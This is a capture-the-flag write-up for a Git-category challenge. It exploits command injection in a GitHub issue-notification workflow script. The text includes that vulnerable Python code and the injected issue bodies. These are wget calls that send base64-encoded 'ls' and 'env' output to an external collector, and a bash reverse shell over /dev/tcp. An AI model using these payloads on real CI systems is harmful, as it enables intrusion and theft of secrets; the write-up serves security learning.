Skip to content

Challenge Data

  • Name: Env
  • Category: Git
  • Points: 443/500

Solution

(continuation of challenge DOCS)

Unfortunately, by the time I’m writing this writeup, both repositories were not longer available.

We had a new repository to inspect. I tried first to inspect the different commits but there was only one. Again, the directory .github with some workflows on it was present. This time the files were named issue-notify.(yaml|py).

The .yaml file had nothing interesting, but the Python script did: 

def issue_notify(title, body, repo):
    # just echo the body into the report repo at /tmp and our scraper script will pick them up and mail them out to staff@
    notify_id = str(uuid.uuid4())
    # only notify on very important issues to reduce spam!
    if 'very important' in title:
        os.system('echo "%s" > /tmp/%s' % (body, notify_id))
    return

def run():
    issue_notify(getenv('ISSUE_TITLE'), getenv('ISSUE_BODY'), Github(getenv('REPORT_TOKEN')))
    return

Each time a new issue (bounced from the public repo) arrived, the run() function was executed. As you can see there is clear Code Injection in the issue_notify function. The command executed inside os.sytem takes into account body variable which is filled with the content of the body of the issue submitted. Furthermore, in order to exceute that line, the tilte of the issue should be the string "very important".

I went to http:/github.com/ekoparty2020/ekolabs and started submitting issues with: * Title: very important * Body: asd" ; #COMMAND_TO_EXECUTE; echo "asd

I used Pipedream in order to check if was receiving any kind of connection from the server. These were my attempts:

  1. Ensure it was working: body --> asd" ; wget https://b9d850e1b49fcdfa12f3c7eb20d3c3e8.m.pipedream.net; echo "asd The GET arrived!!

  2. Execute an 'ls' body --> asd"; wget -X POST https://b9d850e1b49fcdfa12f3c7eb20d3c3e8.m.pipedream.net --post-data=`echo \`ls\` | base64`; echo "asd The Data arrived! But the information wasn't useful

  3. Execute an "env" Because of the name of the challenge, I thought that the flag could be inside the environmental variables. body --> asd"; wget -X POST https://b9d850e1b49fcdfa12f3c7eb20d3c3e8.m.pipedream.net --post-data=`echo \`env\` | base64`; echo "asd The data arrived but was just one value. I didn't realise at this point what was happening (I'll come back later to this).

  4. Execute a rev shell body --> asd"; bash -c "/bin/bash -i >& /dev/tcp/<host>/56894 0>&1"; echo "asd This worked. Once inside just executed the 'env' command and the flag was there!

I didn't want to execute a reverse shell because I was sure that the env command should've worked. Later I realized, that it didn't work beacuse the output was multiline. Most probably, If I should've issued use a tr -d '\n' before encoding it to base64, it could've worked.